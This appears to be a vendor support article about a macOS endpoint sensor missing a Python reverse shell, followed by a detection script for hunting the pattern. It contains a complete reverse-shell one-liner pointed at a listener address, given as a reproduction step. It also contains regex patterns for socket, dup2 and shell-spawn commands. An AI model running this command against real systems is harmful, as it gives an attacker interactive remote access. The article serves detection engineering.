CBC: A certain reverse shell example is not generating a REVERSE_SHELL TTP or alert for MacOS sensors.

Article ID: 288256

Updated On:

Products

  • Carbon Black Cloud Endpoint Standard (formerly Cb Defense)
  • Carbon Black Cloud Enterprise EDR (formerly Cb ThreatHunter)

Issue/Introduction


Run this command, generated with the reverse shell generator at:

https://revshells.com/

python -c 'import sys, socket,os,pty;s=socket.socket();s.connect(("10.1.2.3",8443));[os.dup2(s.fileno(),fd)for fd in (0,1,2)];pty.spawn("sh")'

  • 10.1.2.3:8443 is the listener address and port in the generated command; substitute the address of your own listener before running it.
  • Find the netconn on the Investigate page with the search: netconn_ipv4:10.1.2.3
  • Note that no REVERSE_SHELL TTP is recorded on the process and no alert fires (filter on TTP REVERSE_SHELL to confirm), even though the outbound connection itself is visible.

Environment

  • CBC sensor: All versions
  • CBC Console: All versions
  • Apple MacOS: All versions

Cause

This is a known detection limitation, tracked as DETECT-2649.

Resolution

DETECT-2649 concerns the particular class of reverse shell in which the socket is opened, duplicated onto stdin/stdout/stderr with dup2, and handed to a shell from inside a Python interpreter, as in the one-liner above. The macOS sensor currently records the netconn and the child shell but does not map this pattern to the REVERSE_SHELL TTP; it will be addressed in a future rules iteration.
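Until the rule update ships, the pattern can still be hunted for from the telemetry the sensor does record: an interpreter process with an outbound connection that then spawns a shell, and the tell-tale socket/dup2/spawn sequence in the command line. The script below is an added example, not code from this article or from Carbon Black. It runs that two-signal heuristic over constructed, sensor-style event records; the field names (type, guid, name, cmdline, remote_ip, child_name) are an assumption for illustration and are not the Carbon Black Cloud event schema.

```python
import re

# Constructed sensor-style events (not the Carbon Black Cloud schema), listed
# in the order the sensor would observe them. Each "process" event is followed
# by the netconn and childproc events that process produced.
EVENTS = [
    # The repro from this article: python connects out, then spawns sh.
    {"type": "process", "guid": "p1", "name": "python3",
     "cmdline": "python -c 'import sys, socket,os,pty;s=socket.socket();"
                "s.connect((\"10.1.2.3\",8443));"
                "[os.dup2(s.fileno(),fd)for fd in (0,1,2)];pty.spawn(\"sh\")'"},
    {"type": "netconn", "guid": "p1", "remote_ip": "10.1.2.3", "remote_port": 8443},
    {"type": "childproc", "guid": "p1", "child_name": "sh"},
    # Benign: pip talks to a package index but never spawns a shell.
    {"type": "process", "guid": "p2", "name": "python3",
     "cmdline": "python3 -m pip install requests"},
    {"type": "netconn", "guid": "p2", "remote_ip": "151.101.0.223", "remote_port": 443},
    # Benign: a build script runs sh but opens no network connection.
    {"type": "process", "guid": "p3", "name": "python3",
     "cmdline": "python3 setup.py build"},
    {"type": "childproc", "guid": "p3", "child_name": "sh"},
    # Benign ordering: the shell is spawned before any connection exists,
    # so the shell cannot have been attached to a socket.
    {"type": "process", "guid": "p4", "name": "Python",
     "cmdline": "python3 -c 'import subprocess,urllib.request;"
                "subprocess.call([\"sh\",\"-c\",\"ls\"]);"
                "urllib.request.urlopen(\"https://example.com\")'"},
    {"type": "childproc", "guid": "p4", "child_name": "sh"},
    {"type": "netconn", "guid": "p4", "remote_ip": "93.184.216.34", "remote_port": 443},
]

# Case-insensitive because the macOS framework binary is often named "Python".
INTERPRETER = re.compile(r"^(python[\d.]*|perl|ruby|php|node)$", re.I)
SHELLS = {"sh", "bash", "zsh", "dash"}

# The three things a socket-backed interpreter reverse shell must do: open and
# connect a socket, duplicate it onto the standard fds, then start a shell.
# All three must appear for the command-line signal to fire.
CMDLINE_SIGNS = [
    re.compile(r"socket\.socket\("),
    re.compile(r"\.connect\("),
    re.compile(r"dup2\("),
    re.compile(r"pty\.spawn\(|subprocess|os\.system\(|os\.exec[lv]p?e?\("),
]


def hunt(events):
    """Return {process guid: set of signal names} for processes that look like
    an interpreter-wrapped reverse shell.

    Signals:
      "cmdline" - the process command line contains the socket/dup2/spawn trio
      "lineage" - an interpreter process made an outbound connection and
                  afterwards spawned a shell child (order matters: the socket
                  must exist before the shell that is attached to it)
    """
    procs = {}      # guid -> {"name", "netconn": whether an outbound conn was seen}
    findings = {}   # guid -> set of signals

    for ev in events:
        kind, guid = ev["type"], ev["guid"]
        if kind == "process":
            procs[guid] = {"name": ev["name"], "netconn": False}
            if all(p.search(ev["cmdline"]) for p in CMDLINE_SIGNS):
                findings.setdefault(guid, set()).add("cmdline")
        elif kind == "netconn" and guid in procs:
            procs[guid]["netconn"] = True
        elif kind == "childproc" and guid in procs:
            parent = procs[guid]
            if (INTERPRETER.match(parent["name"])
                    and ev["child_name"] in SHELLS
                    and parent["netconn"]):
                findings.setdefault(guid, set()).add("lineage")
    return findings


if __name__ == "__main__":
    for guid, signals in hunt(EVENTS).items():
        print(f"{guid}: suspected interpreter reverse shell ({', '.join(sorted(signals))})")
```

Only p1 is reported, with both signals. The lineage rule is the more robust of the two because it survives obfuscation of the command line, but it is also the noisier one: an interpreter that first fetches something and then legitimately runs a shell command would match, so treat a lineage-only hit as a lead to triage rather than an alert.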